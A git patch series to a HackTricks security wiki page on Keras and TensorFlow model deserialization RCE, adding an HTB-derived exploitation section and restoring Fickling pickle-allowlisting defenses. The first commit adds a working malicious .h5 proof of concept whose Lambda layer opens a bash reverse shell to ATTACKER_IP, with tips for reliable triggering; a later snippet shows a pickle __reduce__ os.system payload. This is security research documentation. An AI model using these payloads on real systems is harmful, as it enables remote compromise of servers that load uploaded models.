From 6727848590651da5bbe4dffccab7b853e7955a67 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 25 Oct 2025 18:31:17 +0000 Subject: [PATCH 1/3] =?UTF-8?q?Add=20content=20from:=20HTB=20Artificial:?= =?UTF-8?q?=20TensorFlow=20.h5=20model=20RCE=20=E2=86=92=20Backrest=20cred?= =?UTF-8?q?s=20le...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...-deserialization-rce-and-gadget-hunting.md | 100 +++++++----------- 1 file changed, 39 insertions(+), 61 deletions(-) diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md index 1e98392c9b7..86b01086c9b 100644 --- a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md +++ b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md @@ -91,6 +91,39 @@ Security improvements (Keras ≥ 3.9): - Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading - Basic type checking: deserialized objects must match expected types +## Practical exploitation: TensorFlow-Keras HDF5 (.h5) Lambda RCE + +Many production stacks still accept legacy TensorFlow-Keras HDF5 model files (.h5). If an attacker can upload a model that the server later loads or runs inference on, a Lambda layer can execute arbitrary Python on load/build/predict. + +Minimal PoC to craft a malicious .h5 that executes a reverse shell when deserialized or used: + +```python +import tensorflow as tf + +def exploit(x): + import os + os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'") + return x + +m = tf.keras.Sequential() +m.add(tf.keras.layers.Input(shape=(64,))) +m.add(tf.keras.layers.Lambda(exploit)) +m.compile() +m.save("exploit.h5") # legacy HDF5 container +``` + +Notes and reliability tips: +- Trigger points: code may run multiple times (e.g., during layer build/first call, model.load_model, and predict/fit). Make payloads idempotent. +- Version pinning: match the victim’s TF/Keras/Python to avoid serialization mismatches. For example, build artifacts under Python 3.8 with TensorFlow 2.13.1 if that’s what the target uses. +- Quick environment replication: + +```dockerfile +FROM python:3.8-slim +RUN pip install tensorflow-cpu==2.13.1 +``` + +- Validation: a benign payload like os.system("ping -c 1 YOUR_IP") helps confirm execution (e.g., observe ICMP with tcpdump) before switching to a reverse shell. + ## Post-fix gadget surface inside allowlist Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations. @@ -127,6 +160,9 @@ Potential impacts of allowlisted gadgets: Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects. +
+Enumerate potentially dangerous callables in allowlisted Keras modules + ```python import importlib, inspect, pkgutil @@ -170,6 +206,8 @@ for root in ALLOWLIST: print("\n".join(sorted(candidates)[:200])) ``` +
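+
+A possible follow-up triage sketch (not in the original write-up; it assumes the enumeration above prints dotted paths such as keras.utils.get_file): resolve each candidate and keep only callables that can swallow the extra positional argument that Lambda.call() prepends to the target callable, since only those are practical gadgets.
+
+```python
+import importlib, inspect
+
+def tolerates_extra_positional(path: str) -> bool:
+    """Coarse filter: can this callable be invoked with one positional arg?"""
+    mod_name, _, attr = path.rpartition(".")
+    try:
+        fn = getattr(importlib.import_module(mod_name), attr)
+        sig = inspect.signature(fn)
+    except Exception:
+        return False  # not importable or no introspectable signature
+    return any(
+        p.kind in (p.VAR_POSITIONAL, p.POSITIONAL_ONLY, p.POSITIONAL_OR_KEYWORD)
+        for p in sig.parameters.values()
+    )
+
+# usable = sorted(c for c in candidates if tolerates_extra_positional(c))
+```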
+ 2) Direct deserialization testing (no .keras archive needed) Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects. @@ -199,61 +237,6 @@ Keras exists in multiple codebases/eras with different guardrails and formats: Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards. -## Defensive recommendations - -- Treat model files as untrusted input. Only load models from trusted sources. -- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks. -- Do not set safe_mode=False when loading models unless you fully trust the file. -- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access. -- Enforce allowlists/signatures for model sources and integrity checking where possible. - -## ML pickle import allowlisting for AI/ML models (Fickling) - -Many AI/ML model formats (PyTorch .pt/.pth/.ckpt, joblib/scikit-learn, older TensorFlow artifacts, etc.) embed Python pickle data. Attackers routinely abuse pickle GLOBAL imports and object constructors to achieve RCE or model swapping during load. Blacklist-based scanners often miss novel or unlisted dangerous imports. - -A practical fail-closed defense is to hook Python’s pickle deserializer and only allow a reviewed set of harmless ML-related imports during unpickling. Trail of Bits’ Fickling implements this policy and ships a curated ML import allowlist built from thousands of public Hugging Face pickles. - -Security model for “safe” imports (intuitions distilled from research and practice): imported symbols used by a pickle must simultaneously: -- Not execute code or cause execution (no compiled/source code objects, shelling out, hooks, etc.) -- Not get/set arbitrary attributes or items -- Not import or obtain references to other Python objects from the pickle VM -- Not trigger any secondary deserializers (e.g., marshal, nested pickle), even indirectly - -Enable Fickling’s protections as early as possible in process startup so that any pickle loads performed by frameworks (torch.load, joblib.load, etc.) are checked: - -```python -import fickling -# Sets global hooks on the stdlib pickle module -fickling.hook.activate_safe_ml_environment() -``` - -Operational tips: -- You can temporarily disable/re-enable the hooks where needed: - -```python -fickling.hook.deactivate_safe_ml_environment() -# ... load fully trusted files only ... -fickling.hook.activate_safe_ml_environment() -``` - -- If a known-good model is blocked, extend the allowlist for your environment after reviewing the symbols: - -```python -fickling.hook.activate_safe_ml_environment(also_allow=[ - "package.subpackage.safe_symbol", - "another.safe.import", -]) -``` - -- Fickling also exposes generic runtime guards if you prefer more granular control: - - fickling.always_check_safety() to enforce checks for all pickle.load() - - with fickling.check_safety(): for scoped enforcement - - fickling.load(path) / fickling.is_likely_safe(path) for one-off checks - -- Prefer non-pickle model formats when possible (e.g., SafeTensors). If you must accept pickle, run loaders under least privilege without network egress and enforce the allowlist. - -This allowlist-first strategy demonstrably blocks common ML pickle exploit paths while keeping compatibility high. In ToB’s benchmark, Fickling flagged 100% of synthetic malicious files and allowed ~99% of clean files from top Hugging Face repos. 
- ## References - [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization) @@ -262,11 +245,6 @@ This allowlist-first strategy demonstrably blocks common ML pickle exploit paths - [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550) - [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e) - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) -- [Trail of Bits blog – Fickling’s new AI/ML pickle file scanner](https://blog.trailofbits.com/2025/09/16/ficklings-new-ai/ml-pickle-file-scanner/) -- [Fickling – Securing AI/ML environments (README)](https://github.com/trailofbits/fickling#securing-aiml-environments) -- [Fickling pickle scanning benchmark corpus](https://github.com/trailofbits/fickling/tree/master/pickle_scanning_benchmark) -- [Picklescan](https://github.com/mmaitre314/picklescan), [ModelScan](https://github.com/protectai/modelscan), [model-unpickler](https://github.com/goeckslab/model-unpickler) -- [Sleepy Pickle attacks background](https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/) -- [SafeTensors project](https://github.com/safetensors/safetensors) +- [HTB Artificial – TensorFlow .h5 Lambda RCE to root](https://0xdf.gitlab.io/2025/10/25/htb-artificial.html) {{#include ../../banners/hacktricks-training.md}} \ No newline at end of file From 399c62f3dc51838724957ee38bc170b24eb2ad70 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 7 Nov 2025 01:42:53 +0100 Subject: [PATCH 2/3] Update keras-model-deserialization-rce-and-gadget-hunting.md --- ...-deserialization-rce-and-gadget-hunting.md | 53 +++++++++++++++++-- 1 file changed, 48 insertions(+), 5 deletions(-) diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md index 86b01086c9b..2581a35614d 100644 --- a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md +++ b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md @@ -149,10 +149,53 @@ Gadget via Lambda that references an allowed function (not serialized Python byt Important limitation: - Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable. -Potential impacts of allowlisted gadgets: -- Arbitrary download/write (path planting, config poisoning) -- Network callbacks/SSRF-like effects depending on environment -- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists +## ML pickle import allowlisting for AI/ML models (Fickling) + +Many AI/ML model formats (PyTorch .pt/.pth/.ckpt, joblib/scikit-learn, older TensorFlow artifacts, etc.) embed Python pickle data. Attackers routinely abuse pickle GLOBAL imports and object constructors to achieve RCE or model swapping during load. Blacklist-based scanners often miss novel or unlisted dangerous imports. 
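+
+To make the abuse concrete, a minimal generic illustration (the standard pickle `__reduce__`/GLOBAL trick, not tied to any particular model format): the pickle stream imports an attacker-chosen callable and invokes it while the file is being loaded.
+
+```python
+import pickle, pickletools
+
+class Payload:
+    def __reduce__(self):
+        import os
+        # Serialized as a GLOBAL/STACK_GLOBAL import of os.system plus REDUCE,
+        # so the command runs during pickle.load() on any unprotected loader.
+        return (os.system, ("id > /tmp/pwned",))
+
+blob = pickle.dumps(Payload())
+pickletools.dis(blob)   # inspect the opcodes; note the import of os.system
+# pickle.loads(blob)    # would execute the command
+```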
+ +A practical fail-closed defense is to hook Python’s pickle deserializer and only allow a reviewed set of harmless ML-related imports during unpickling. Trail of Bits’ Fickling implements this policy and ships a curated ML import allowlist built from thousands of public Hugging Face pickles. + +Security model for “safe” imports (intuitions distilled from research and practice): imported symbols used by a pickle must simultaneously: +- Not execute code or cause execution (no compiled/source code objects, shelling out, hooks, etc.) +- Not get/set arbitrary attributes or items +- Not import or obtain references to other Python objects from the pickle VM +- Not trigger any secondary deserializers (e.g., marshal, nested pickle), even indirectly + +Enable Fickling’s protections as early as possible in process startup so that any pickle loads performed by frameworks (torch.load, joblib.load, etc.) are checked: + +```python +import fickling +# Sets global hooks on the stdlib pickle module +fickling.hook.activate_safe_ml_environment() +``` + +Operational tips: +- You can temporarily disable/re-enable the hooks where needed: + +```python +fickling.hook.deactivate_safe_ml_environment() +# ... load fully trusted files only ... +fickling.hook.activate_safe_ml_environment() +``` + +- If a known-good model is blocked, extend the allowlist for your environment after reviewing the symbols: + +```python +fickling.hook.activate_safe_ml_environment(also_allow=[ + "package.subpackage.safe_symbol", + "another.safe.import", +]) +``` + +- Fickling also exposes generic runtime guards if you prefer more granular control: + - fickling.always_check_safety() to enforce checks for all pickle.load() + - with fickling.check_safety(): for scoped enforcement + - fickling.load(path) / fickling.is_likely_safe(path) for one-off checks + +- Prefer non-pickle model formats when possible (e.g., SafeTensors). If you must accept pickle, run loaders under least privilege without network egress and enforce the allowlist. + +This allowlist-first strategy demonstrably blocks common ML pickle exploit paths while keeping compatibility high. In ToB’s benchmark, Fickling flagged 100% of synthetic malicious files and allowed ~99% of clean files from top Hugging Face repos. 
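+
+A minimal sketch of how these pieces can be combined in a loading path (it uses only the calls named above; treat exact return values and exceptions as version-dependent and verify against your Fickling release):
+
+```python
+import fickling
+import torch
+
+# Fail-closed hooks: unlisted pickle imports abort deserialization
+fickling.hook.activate_safe_ml_environment()
+
+def load_untrusted_checkpoint(path: str):
+    # Optional one-off triage before the real load
+    if not fickling.is_likely_safe(path):
+        raise ValueError(f"refusing to load {path}: suspicious pickle imports")
+    # torch.load unpickles via the hooked pickle module, so the allowlist still applies
+    return torch.load(path, map_location="cpu")
+```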
+ ## Researcher toolkit @@ -247,4 +290,4 @@ Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover reg - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) - [HTB Artificial – TensorFlow .h5 Lambda RCE to root](https://0xdf.gitlab.io/2025/10/25/htb-artificial.html) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} From 036f9982ed913c5ec208bcfada41476d25e6a982 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 7 Nov 2025 01:52:43 +0100 Subject: [PATCH 3/3] Update keras-model-deserialization-rce-and-gadget-hunting.md --- .../keras-model-deserialization-rce-and-gadget-hunting.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md index 2581a35614d..a285543aeb9 100644 --- a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md +++ b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md @@ -289,5 +289,11 @@ Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover reg - [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e) - [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3) - [HTB Artificial – TensorFlow .h5 Lambda RCE to root](https://0xdf.gitlab.io/2025/10/25/htb-artificial.html) +- [Trail of Bits blog – Fickling’s new AI/ML pickle file scanner](https://blog.trailofbits.com/2025/09/16/ficklings-new-ai/ml-pickle-file-scanner/) +- [Fickling – Securing AI/ML environments (README)](https://github.com/trailofbits/fickling#securing-aiml-environments) +- [Fickling pickle scanning benchmark corpus](https://github.com/trailofbits/fickling/tree/master/pickle_scanning_benchmark) +- [Picklescan](https://github.com/mmaitre314/picklescan), [ModelScan](https://github.com/protectai/modelscan), [model-unpickler](https://github.com/goeckslab/model-unpickler) +- [Sleepy Pickle attacks background](https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/) +- [SafeTensors project](https://github.com/safetensors/safetensors) {{#include ../../banners/hacktricks-training.md}}